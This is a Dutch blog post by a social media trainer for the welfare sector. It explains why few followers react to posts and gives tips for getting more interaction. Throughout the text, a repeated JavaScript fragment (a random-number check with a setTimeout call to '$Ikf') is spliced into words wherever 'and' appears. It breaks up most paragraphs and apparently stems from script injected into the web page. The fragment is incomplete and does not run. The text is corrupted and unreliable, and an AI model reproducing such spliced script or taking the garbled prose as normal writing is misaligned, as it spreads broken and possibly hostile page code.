Afrekenen met social media knelpunt 5, weinig interactie met de doelgroep

Ik wil meer interactie! Bekend? Vaak wordt er niet gereageerd op een bericht dat je via sociale media de wereld in stuurt. Tenminste, dat hoor ik vaker. Dat is natuurlijk wel een beetje vreemd. Sociale media zijn juist gebaseerd op interactie met elkaar. Jij zelf of iemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders deelt iets. Daar wordt op gereageerd. Dat ziet de afzender. Ook andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen zien die reactie en kunnen daar weer op reageren.

Een op de tien
Maar er zit wat in. Er is op sociale media iets geks gaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande waar je wel rekening mee moet houden wanneer je een bericht plaatst. Je hoopt natuurlijk dat iedereen jouw berichten interessant of leuk gaat vinden en er op gaat reageren. De werkelijkheid is dat van de tien mensen die jouw berichten volgen op sociale media er een zal zijn die actief iets met je bericht gaat doen (delen, doorsturen, reageren). Daarnaast zijn er misschien drie / vier andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen die af en toe iets met je bericht zullen doen. En die andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere zeven lezen hopelijk je bericht of gaan het missen in de stroom informatie die dagelijks los komt.

Wat jij kunt doen voor meer interactie
Dat is dus niet veel inderdaad. Maar een van de tien die actief iets met je bericht doet. Je hoopt natuurlijk op meer. Gelukkig kan je er zelf wel wat aan doen! Dat  is eigenlijk redelijk eenvoudig.:

  1. Kijk en luister naar wat andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere zeggen / plaatsen. Waar hebben ze het over, op welke toon?
  2. Stel vragen, reageer actief op andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen.
  3. Plaatst zelf regelmatig berichten over wat je doet, denkt of vindt. Zorg dat die berichten interessant of leuk genoeg zijn voor de lezer.
  4. Lok reacties en acties uit door er naar te vragen of door mensen op te roepen iets te doen (activeren).
  5. Vraag gerust af en toe om je berichten met andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen te delen.

Maak interactie lonend
Probeer het eens een tijdje uit. Geef het ook de tijd. Plaatst niet eens per twee weken een bericht.  Maak er dagelijks een half uurtje voor vrij. Plaatst met regelmaat nieuwe berichten, op een vast tijdstip bijvoorbeeld, zodat mensen er op gaan rekenen.

En wees helder in wat mensen van jou kunnen verwachten, over welk onderwerp jij het vaak gaat hebben. Waarschijnlijk ga je zien dat het aantal volgers langzaam toeneemt. Dat mensen je berichten vaker gaan delen. En dat het aantal interacties ook langzaam toe neemt.

Hoe actiever jij bent, hoe meer resultaat je krijgt.

Welzijn 3.0, Hans Versteegh

Hartelijke groeten,
Hans Versteegh
De sociaalste social media trainer, Welzijn 3.0
Mail mij op  h.versteegh@welzijn30.nl of bel mij op 06-44062029.

p.s. Wil je meer van deze tips? Dit knelpunt en andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen staan ook in het e-book “Jij kan het ook! Afrekenen met social media knelpunten in Welzijn.” dat binnenkort verschijnt. Wil je dat ontvangen, schrijf je dan in via het formulier hieronder aan de pagina.

Lees ook: https://www.welzijn30.nl/afrekenen-met-social-media-knelpunt-6-niet-weten-wat-je-moet-vertellen/

BewarenBewaren